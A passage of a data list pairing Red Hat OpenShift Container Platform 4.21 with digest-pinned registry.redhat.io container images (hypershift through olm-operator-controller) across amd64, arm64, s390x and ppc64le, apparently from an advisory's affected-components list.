"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:b7efeca8929d172e7503b64eb8cc10702a773659b0164677340b7064fbd1c666_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:1a44fa131e595d60988892ad25b116fc222f73f6eeeb7ac9a97bf2f4c56c886b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:b51b328c0c3a959fef4f4c0f19e9181ddc6ea7d1fbaaee32aa08e503b4d3e073_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:dbe850c3431727e2807a166c82b2e40b220777e26075f4b8aca1999785a94eac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:fddfe46a98d3a4c9a7c189eded7e26758c011f8f32d1617c337711cdd65c18be_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:19a4b711ef857314773d4ca4f4a8b82d7a117250d4c2c92c57c1d1681e7330f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:69fed0fc9f0b00ca9000d646f22eb727fdabc7de817dbdcbf28c4517c01e472d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3a419c18cfdf7042b7a65afae46f1b43f61935e0cbbcd54e36f49b078a2b070e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:429a55b2ba3ad36682ecd1620103ecdead80af48c9c42148fd72867e53aab0e0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:7965d673c6109f3fd2baa5efb4c54cae58fb9ba94b33ebba7d187c0f5679c9a0_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:991ca2f8ecf0ff4667112c5b0aff40813521700c6dad06f867e0e5e56086d6a7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:27bc2f7818ed3b3c0837670c1906599718807aaee793029ebe3cba852985d107_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6195a65079f6c39b06a7be04d290dd49deaeba212ba499d233744d8cfd2c2de7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:ac5ab16306a43fcdea3fbf40873cc8307422796118570ee78c6d2ccd7767fa32_amd64",
